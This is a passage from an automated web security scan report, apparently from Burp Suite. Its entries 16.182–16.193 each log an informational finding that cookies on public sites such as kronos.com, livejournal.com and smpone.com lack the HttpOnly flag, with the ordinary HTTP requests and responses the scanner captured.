<html><body bgcolor="#ffffff" link="#000000" alink="#000000" vlink="#000000" leftMargin="0" topMargin="0" marginwidth="0" marginheight="0"><center><font style="font-size:11px" face="arial,sans
...[SNIP]...

16.182. http://www.kronos.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.kronos.com
Path:   /

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: www.kronos.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: private
Date: Mon, 25 Apr 2011 13:33:42 GMT
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: ecm=user_id=0&isMembershipUser=0&site_id=&username=&new_site=/&unique_id=0&site_preview=0&langvalue=0&DefaultLanguage=1033&NavLanguage=1033&LastValidLanguageID=1033&DefaultCurrency=840&SiteCurrency=840&ContType=&UserCulture=1033&dm=www.kronos.com&SiteLanguage=1033; path=/
Set-Cookie: EktGUID=91eff232-0ee4-4940-9643-e76914405540; expires=Wed, 25-Apr-2012 13:33:41 GMT; path=/
Set-Cookie: EkAnalytics=newuser; expires=Wed, 25-Apr-2012 13:33:41 GMT; path=/
Set-Cookie: KRONOS_PUBLIC_US=WntmyN5z9PTwW3dITu3dPTmlzgHQFsqFwJIqve05HUWIOX9pQUkyTzbW8Sh8AMxsm9G3H0e2qU1RztpCBrjx28ZfWtu9UPonnhB-lqbtv18bPhzsYu4EaTChKkmW_cMtT-iWtxAMfK68X75hYm-6Uuzr9Gjun_AXuk1KYvMoqvvnCwBB0; expires=Mon, 04-Jul-2011 00:13:41 GMT; path=/; HttpOnly
Set-Cookie: ASP.NET_SessionId=by3m1fvhqslzgkurzbbrw5um; path=/; HttpOnly
Vary: Accept-Encoding
Content-Length: 39469


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html id="ctl00_html1" xmlns="http://www.w3.org/1999/xhtml" lang="en-US">
...[SNIP]...

16.183. http://www.livejournal.com/tools/endpoints/journalspotlight.bml  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.livejournal.com
Path:   /tools/endpoints/journalspotlight.bml

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /tools/endpoints/journalspotlight.bml?skip=1&limit=&show_userpics=1&user=&_rand=0.36380812083370984 HTTP/1.1
Host: www.livejournal.com
Proxy-Connection: keep-alive
Referer: http://www.livejournal.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=164322722.1303741260.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=164322722.814293328.1303741260.1303741260.1303741260.1; __utmc=164322722; __utmb=164322722.1.10.1303741260

Response

HTTP/1.1 200 OK
Server: GoatProxy 1.0
Date: Mon, 25 Apr 2011 14:35:25 GMT
Content-Type: text/html; charset=utf-8
Connection: close
X-AWS-Id: ws15
Set-Cookie: ljuniq=Xw061catQYuvMxT:1303742123:pgstats0:m0; expires=Friday, 24-Jun-2011 14:35:23 GMT; domain=.livejournal.com; path=/
Cache-Control: private, proxy-revalidate
ETag: "768345d85a0645590662a213040f76ec"
Vary: Accept-Encoding
Content-Language: en
X-Varnish: 774812408
Age: 0
Via: 1.1 varnish
Content-Length: 2875

{"text":"<table width='100%'><tr><td valign='top' rowspan='2' style='padding-right: 5px;'>\n<div class='normal-users'>\n<ul class='nostyle pkg'>\n<li class='spotlight-1 with-userpic'><span class='user
...[SNIP]...

16.184. http://www.netsuite.com/pages/portal/page_not_found.jspinternal=T  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.netsuite.com
Path:   /pages/portal/page_not_found.jspinternal=T

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /pages/portal/page_not_found.jspinternal=T HTTP/1.1
Host: www.netsuite.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mbox=session#1303736347554-914602#1303743997|PC#1303736347554-914602.17#1304951737|check#true#1303742197

Response

HTTP/1.1 404 Not Found
Server: Apache
Content-Length: 1229
P3P: CP="CAO PSAa OUR BUS PUR"
Content-Type: text/html; charset=UTF-8
Date: Mon, 25 Apr 2011 15:13:51 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: NS_VER=2011.1.0; domain=www.netsuite.com; path=/


<!-- -------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
...[SNIP]...

16.185. http://www.smpone.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.smpone.com
Path:   /

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /?gclid=CLbB86LPt6gCFSIRNAod2E3lCQ HTTP/1.1
Host: www.smpone.com
Proxy-Connection: keep-alive
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=207027601.1303732845.1.1.utmgclid=CLbB86LPt6gCFSIRNAod2E3lCQ|utmccn=(not%20set)|utmcmd=(not%20set); __utma=207027601.661607507.1303732845.1303732845.1303732845.1; __utmc=207027601; __utmb=207027601.1.10.1303732845; TresCMS[tres_uid]=1; TresCMS[tres_group]=0; TresCMS[ident]=7723f22f24f91f5a8b45b95e78b94b17; TresCMS[last_visit]=0; TresCMS[timezone]=EDT; TresCMS[user_ip]=173.193.214.243

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 12:17:47 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Powered-By: PHP/5.3.2
Set-Cookie: TresCMS[tres_uid]=1; expires=Tue, 24-Apr-2012 12:17:47 GMT; path=/
Set-Cookie: TresCMS[tres_group]=0; expires=Tue, 24-Apr-2012 12:17:47 GMT; path=/
Set-Cookie: TresCMS[ident]=7723f22f24f91f5a8b45b95e78b94b17; expires=Tue, 24-Apr-2012 12:17:47 GMT; path=/
Set-Cookie: TresCMS[last_visit]=0; expires=Tue, 24-Apr-2012 12:17:47 GMT; path=/
Set-Cookie: TresCMS[timezone]=EDT; expires=Tue, 24-Apr-2012 12:17:47 GMT; path=/
Set-Cookie: TresCMS[user_ip]=173.193.214.243; expires=Tue, 24-Apr-2012 12:17:47 GMT; path=/
Set-Cookie: TresCMS[last_visit_temp]=1303733867; expires=Mon, 25-Apr-2011 12:27:47 GMT; path=/
Content-Type: text/html
Content-Length: 15026

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<title>Security Management Partners Information Security Consultants</title>
<meta
...[SNIP]...

16.186. http://www.smpone.com/404.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.smpone.com
Path:   /404.php

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /404.php HTTP/1.1
Host: www.smpone.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=207027601.1303732845.1.1.utmgclid=CLbB86LPt6gCFSIRNAod2E3lCQ|utmccn=(not%20set)|utmcmd=(not%20set); TresCMS[tres_uid]=1; TresCMS[tres_group]=0; TresCMS[ident]=7723f22f24f91f5a8b45b95e78b94b17; TresCMS[last_visit]=0; TresCMS[timezone]=EDT; TresCMS[user_ip]=173.193.214.243; TresCMS[last_visit_temp]=1303733867; __utma=207027601.661607507.1303732845.1303732845.1303732845.1; __utmc=207027601; __utmb=207027601.2.10.1303732845

Response

HTTP/1.1 404 Not Found
Date: Mon, 25 Apr 2011 12:17:49 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Powered-By: PHP/5.3.2
Set-Cookie: TresCMS[tres_uid]=1; expires=Tue, 24-Apr-2012 12:17:49 GMT; path=/
Set-Cookie: TresCMS[tres_group]=0; expires=Tue, 24-Apr-2012 12:17:49 GMT; path=/
Set-Cookie: TresCMS[ident]=7723f22f24f91f5a8b45b95e78b94b17; expires=Tue, 24-Apr-2012 12:17:49 GMT; path=/
Set-Cookie: TresCMS[last_visit]=0; expires=Tue, 24-Apr-2012 12:17:49 GMT; path=/
Set-Cookie: TresCMS[timezone]=EDT; expires=Tue, 24-Apr-2012 12:17:49 GMT; path=/
Set-Cookie: TresCMS[user_ip]=173.193.214.243; expires=Tue, 24-Apr-2012 12:17:49 GMT; path=/
Set-Cookie: TresCMS[last_visit_temp]=1303733869; expires=Mon, 25-Apr-2011 12:27:49 GMT; path=/
Content-Length: 0
Content-Type: text/html


16.187. http://www.smpone.com/News-more-79.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.smpone.com
Path:   /News-more-79.html

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /News-more-79.html HTTP/1.1
Host: www.smpone.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=207027601.1303732845.1.1.utmgclid=CLbB86LPt6gCFSIRNAod2E3lCQ|utmccn=(not%20set)|utmcmd=(not%20set); PHPSESSID=b07217b91d15829f50a400a4c700d48f; __utma=207027601.661607507.1303732845.1303732845.1303732845.1; __utmc=207027601; __utmb=207027601.18.10.1303732845; TresCMS[tres_uid]=1; TresCMS[tres_group]=0; TresCMS[ident]=7723f22f24f91f5a8b45b95e78b94b17; TresCMS[last_visit]=0; TresCMS[timezone]=EDT; TresCMS[user_ip]=173.193.214.243; TresCMS[last_visit_temp]=1303733966

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 12:19:27 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Powered-By: PHP/5.3.2
Set-Cookie: TresCMS[tres_uid]=1; expires=Tue, 24-Apr-2012 12:19:27 GMT; path=/
Set-Cookie: TresCMS[tres_group]=0; expires=Tue, 24-Apr-2012 12:19:27 GMT; path=/
Set-Cookie: TresCMS[ident]=7723f22f24f91f5a8b45b95e78b94b17; expires=Tue, 24-Apr-2012 12:19:27 GMT; path=/
Set-Cookie: TresCMS[last_visit]=0; expires=Tue, 24-Apr-2012 12:19:27 GMT; path=/
Set-Cookie: TresCMS[timezone]=EDT; expires=Tue, 24-Apr-2012 12:19:27 GMT; path=/
Set-Cookie: TresCMS[user_ip]=173.193.214.243; expires=Tue, 24-Apr-2012 12:19:27 GMT; path=/
Set-Cookie: TresCMS[last_visit_temp]=1303733967; expires=Mon, 25-Apr-2011 12:29:27 GMT; path=/
Content-Type: text/html
Content-Length: 11498

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<title>Security Management Partners - </title>
<meta http-equiv="Content-Type" con
...[SNIP]...

16.188. http://www.smpone.com/News-more-80.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.smpone.com
Path:   /News-more-80.html

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /News-more-80.html HTTP/1.1
Host: www.smpone.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=207027601.1303732845.1.1.utmgclid=CLbB86LPt6gCFSIRNAod2E3lCQ|utmccn=(not%20set)|utmcmd=(not%20set); PHPSESSID=b07217b91d15829f50a400a4c700d48f; __utma=207027601.661607507.1303732845.1303732845.1303732845.1; __utmc=207027601; __utmb=207027601.17.10.1303732845; TresCMS[tres_uid]=1; TresCMS[tres_group]=0; TresCMS[ident]=7723f22f24f91f5a8b45b95e78b94b17; TresCMS[last_visit]=0; TresCMS[timezone]=EDT; TresCMS[user_ip]=173.193.214.243; TresCMS[last_visit_temp]=1303733959

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 12:19:25 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Powered-By: PHP/5.3.2
Set-Cookie: TresCMS[tres_uid]=1; expires=Tue, 24-Apr-2012 12:19:25 GMT; path=/
Set-Cookie: TresCMS[tres_group]=0; expires=Tue, 24-Apr-2012 12:19:25 GMT; path=/
Set-Cookie: TresCMS[ident]=7723f22f24f91f5a8b45b95e78b94b17; expires=Tue, 24-Apr-2012 12:19:25 GMT; path=/
Set-Cookie: TresCMS[last_visit]=0; expires=Tue, 24-Apr-2012 12:19:25 GMT; path=/
Set-Cookie: TresCMS[timezone]=EDT; expires=Tue, 24-Apr-2012 12:19:25 GMT; path=/
Set-Cookie: TresCMS[user_ip]=173.193.214.243; expires=Tue, 24-Apr-2012 12:19:25 GMT; path=/
Set-Cookie: TresCMS[last_visit_temp]=1303733965; expires=Mon, 25-Apr-2011 12:29:25 GMT; path=/
Content-Type: text/html
Content-Length: 11467

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<title>Security Management Partners - </title>
<meta http-equiv="Content-Type" con
...[SNIP]...

16.189. http://www.smpone.com/News.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.smpone.com
Path:   /News.html

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /News.html HTTP/1.1
Host: www.smpone.com
Proxy-Connection: keep-alive
Referer: http://www.smpone.com/Sections-read-16.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=207027601.1303732845.1.1.utmgclid=CLbB86LPt6gCFSIRNAod2E3lCQ|utmccn=(not%20set)|utmcmd=(not%20set); PHPSESSID=b07217b91d15829f50a400a4c700d48f; __utma=207027601.661607507.1303732845.1303732845.1303732845.1; __utmc=207027601; __utmb=207027601.16.10.1303732845; TresCMS[tres_uid]=1; TresCMS[tres_group]=0; TresCMS[ident]=7723f22f24f91f5a8b45b95e78b94b17; TresCMS[last_visit]=0; TresCMS[timezone]=EDT; TresCMS[user_ip]=173.193.214.243; TresCMS[last_visit_temp]=1303733952

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 12:19:18 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Powered-By: PHP/5.3.2
Set-Cookie: TresCMS[tres_uid]=1; expires=Tue, 24-Apr-2012 12:19:18 GMT; path=/
Set-Cookie: TresCMS[tres_group]=0; expires=Tue, 24-Apr-2012 12:19:18 GMT; path=/
Set-Cookie: TresCMS[ident]=7723f22f24f91f5a8b45b95e78b94b17; expires=Tue, 24-Apr-2012 12:19:18 GMT; path=/
Set-Cookie: TresCMS[last_visit]=0; expires=Tue, 24-Apr-2012 12:19:18 GMT; path=/
Set-Cookie: TresCMS[timezone]=EDT; expires=Tue, 24-Apr-2012 12:19:18 GMT; path=/
Set-Cookie: TresCMS[user_ip]=173.193.214.243; expires=Tue, 24-Apr-2012 12:19:18 GMT; path=/
Set-Cookie: TresCMS[last_visit_temp]=1303733958; expires=Mon, 25-Apr-2011 12:29:18 GMT; path=/
Content-Type: text/html
Content-Length: 12575

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<title>Security Management Partners - </title>
<meta http-equiv="Content-Type" con
...[SNIP]...

16.190. http://www.smpone.com/Sections-read-10.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.smpone.com
Path:   /Sections-read-10.html

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /Sections-read-10.html HTTP/1.1
Host: www.smpone.com
Proxy-Connection: keep-alive
Referer: http://www.smpone.com/Sections-read-125.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=207027601.1303732845.1.1.utmgclid=CLbB86LPt6gCFSIRNAod2E3lCQ|utmccn=(not%20set)|utmcmd=(not%20set); __utma=207027601.661607507.1303732845.1303732845.1303732845.1; __utmc=207027601; __utmb=207027601.8.10.1303732845; TresCMS[tres_uid]=1; TresCMS[tres_group]=0; TresCMS[ident]=7723f22f24f91f5a8b45b95e78b94b17; TresCMS[last_visit]=0; TresCMS[timezone]=EDT; TresCMS[user_ip]=173.193.214.243; TresCMS[last_visit_temp]=1303733890

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 12:18:12 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Powered-By: PHP/5.3.2
Set-Cookie: TresCMS[tres_uid]=1; expires=Tue, 24-Apr-2012 12:18:12 GMT; path=/
Set-Cookie: TresCMS[tres_group]=0; expires=Tue, 24-Apr-2012 12:18:12 GMT; path=/
Set-Cookie: TresCMS[ident]=7723f22f24f91f5a8b45b95e78b94b17; expires=Tue, 24-Apr-2012 12:18:12 GMT; path=/
Set-Cookie: TresCMS[last_visit]=0; expires=Tue, 24-Apr-2012 12:18:12 GMT; path=/
Set-Cookie: TresCMS[timezone]=EDT; expires=Tue, 24-Apr-2012 12:18:12 GMT; path=/
Set-Cookie: TresCMS[user_ip]=173.193.214.243; expires=Tue, 24-Apr-2012 12:18:12 GMT; path=/
Set-Cookie: TresCMS[last_visit_temp]=1303733892; expires=Mon, 25-Apr-2011 12:28:12 GMT; path=/
Content-Type: text/html
Content-Length: 13895

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<title>Security Management Partners Information Security Consultants - HIPAA</titl
...[SNIP]...

16.191. http://www.smpone.com/Sections-read-125.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.smpone.com
Path:   /Sections-read-125.html

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /Sections-read-125.html HTTP/1.1
Host: www.smpone.com
Proxy-Connection: keep-alive
Referer: http://www.smpone.com/images/menu_right.swf
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=207027601.1303732845.1.1.utmgclid=CLbB86LPt6gCFSIRNAod2E3lCQ|utmccn=(not%20set)|utmcmd=(not%20set); TresCMS[tres_uid]=1; TresCMS[tres_group]=0; TresCMS[ident]=7723f22f24f91f5a8b45b95e78b94b17; TresCMS[last_visit]=0; TresCMS[timezone]=EDT; TresCMS[user_ip]=173.193.214.243; TresCMS[last_visit_temp]=1303733886; __utma=207027601.661607507.1303732845.1303732845.1303732845.1; __utmc=207027601; __utmb=207027601.7.10.1303732845

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 12:18:08 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Powered-By: PHP/5.3.2
Set-Cookie: TresCMS[tres_uid]=1; expires=Tue, 24-Apr-2012 12:18:08 GMT; path=/
Set-Cookie: TresCMS[tres_group]=0; expires=Tue, 24-Apr-2012 12:18:08 GMT; path=/
Set-Cookie: TresCMS[ident]=7723f22f24f91f5a8b45b95e78b94b17; expires=Tue, 24-Apr-2012 12:18:08 GMT; path=/
Set-Cookie: TresCMS[last_visit]=0; expires=Tue, 24-Apr-2012 12:18:08 GMT; path=/
Set-Cookie: TresCMS[timezone]=EDT; expires=Tue, 24-Apr-2012 12:18:08 GMT; path=/
Set-Cookie: TresCMS[user_ip]=173.193.214.243; expires=Tue, 24-Apr-2012 12:18:08 GMT; path=/
Set-Cookie: TresCMS[last_visit_temp]=1303733888; expires=Mon, 25-Apr-2011 12:28:08 GMT; path=/
Content-Type: text/html
Content-Length: 11579

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<title>Security Management Partners - Regulatory Compliance</title>
<meta http-equ
...[SNIP]...

16.192. http://www.smpone.com/Sections-read-126.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.smpone.com
Path:   /Sections-read-126.html

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /Sections-read-126.html HTTP/1.1
Host: www.smpone.com
Proxy-Connection: keep-alive
Referer: http://www.smpone.com/Sections-read-10.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=207027601.1303732845.1.1.utmgclid=CLbB86LPt6gCFSIRNAod2E3lCQ|utmccn=(not%20set)|utmcmd=(not%20set); __utma=207027601.661607507.1303732845.1303732845.1303732845.1; __utmc=207027601; __utmb=207027601.9.10.1303732845; TresCMS[tres_uid]=1; TresCMS[tres_group]=0; TresCMS[ident]=7723f22f24f91f5a8b45b95e78b94b17; TresCMS[last_visit]=0; TresCMS[timezone]=EDT; TresCMS[user_ip]=173.193.214.243; TresCMS[last_visit_temp]=1303733893

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 12:18:15 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Powered-By: PHP/5.3.2
Set-Cookie: TresCMS[tres_uid]=1; expires=Tue, 24-Apr-2012 12:18:15 GMT; path=/
Set-Cookie: TresCMS[tres_group]=0; expires=Tue, 24-Apr-2012 12:18:15 GMT; path=/
Set-Cookie: TresCMS[ident]=7723f22f24f91f5a8b45b95e78b94b17; expires=Tue, 24-Apr-2012 12:18:15 GMT; path=/
Set-Cookie: TresCMS[last_visit]=0; expires=Tue, 24-Apr-2012 12:18:15 GMT; path=/
Set-Cookie: TresCMS[timezone]=EDT; expires=Tue, 24-Apr-2012 12:18:15 GMT; path=/
Set-Cookie: TresCMS[user_ip]=173.193.214.243; expires=Tue, 24-Apr-2012 12:18:15 GMT; path=/
Set-Cookie: TresCMS[last_visit_temp]=1303733895; expires=Mon, 25-Apr-2011 12:28:15 GMT; path=/
Content-Type: text/html
Content-Length: 12064

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<title>Security Management Partners - IT Assurance/Vulnerability Assessment</title
...[SNIP]...

16.193. http://www.smpone.com/Sections-read-16.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.smpone.com
Path:   /Sections-read-16.html

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /Sections-read-16.html HTTP/1.1
Host: www.smpone.com
Proxy-Connection: keep-alive
Referer: http://www.smpone.com/?gclid=CLbB86LPt6gCFSIRNAod2E3lCQ
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=207027601.1303732845.1.1.utmgclid=CLbB86LPt6gCFSIRNAod2E3lCQ|utmccn=(not%20set)|utmcmd=(not%20set); __utma=207027601.661607507.1303732845.1303732845.1303732845.1; __utmc=207027601; __utmb=207027601.3.10.1303732845; TresCMS[tres_uid]=1; TresCMS[tres_group]=0; TresCMS[ident]=7723f22f24f91f5a8b45b95e78b94b17; TresCMS[last_visit]=0; TresCMS[timezone]=EDT; TresCMS[user_ip]=173.193.214.243; TresCMS[last_visit_temp]=1303733879

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 12:18:01 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Powered-By: PHP/5.3.2
